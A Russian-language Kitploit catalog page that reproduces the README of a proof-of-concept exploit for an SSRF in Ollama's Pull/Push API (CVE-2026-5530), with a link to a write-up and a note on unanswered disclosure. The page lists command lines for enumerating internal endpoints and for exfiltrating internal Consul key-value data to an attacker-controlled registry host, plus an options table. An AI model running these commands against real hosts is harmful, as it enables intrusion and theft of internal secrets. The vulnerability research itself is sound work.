Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-5530 — Эксплойт proof-of-concept для CVE-2026-5530, SSRF в Pull/Push API Ollama, позволяющий перечислять внутренние конечные точки и полностью выгружать ответы через поддельный OCI-реестр. | Kitploit
Инструменты/GitHubGitHub/davidrxchester/cve-2026-5530
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхСбор информации
GitHubdavidrxchester/cve-2026-5530

CVE-2026-5530

Эксплойт proof-of-concept для CVE-2026-5530, SSRF в Pull/Push API Ollama, позволяющий перечислять внутренние конечные точки и полностью выгружать ответы через поддельный OCI-реестр.

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-5530

SSRF в Ollama через редирект OCI-реестра с полной эксфильтрацией ответа.

Разбор: https://davidrochester.com/posts/cve-2026-5530

Раскрытие

С Ollama связывались несколько раз, но ответа не последовало.

Использование

Три режима: enum, exfil и probe.

Enum

Находит живые внутренние конечные точки, доступные с хоста Ollama.

root@kitploit:~
python3 poc.py targets.txt --registry-host <ваш-ip>

Exfil

Эксфильтрирует ответы SSRF, когда известен размер ответа.

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <ваш-ip>

Probe

Автоматически выполняет бинарный поиск размера ответа, затем эксфильтрирует.

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <ваш-ip>

Параметры

root@kitploit:~
target              URL или файл с URL-адресами (по одному в строке, # для комментариев)
-p, --port          порт вредоносного реестра (по умолчанию: 9999)
--exfil-port        порт реестра эксфильтрации (по умолчанию: 10000)
--exfil             режим эксфильтрации, требует --size
--probe             бинарный поиск размера, затем эксфильтрация
--size              Content-Length (обязателен с --exfil)
--registry-host     IP/имя хоста атакующего, доступное для Ollama
--ollama            URL API Ollama (по умолчанию: http://127.0.0.1:11434)
Скачать инструмент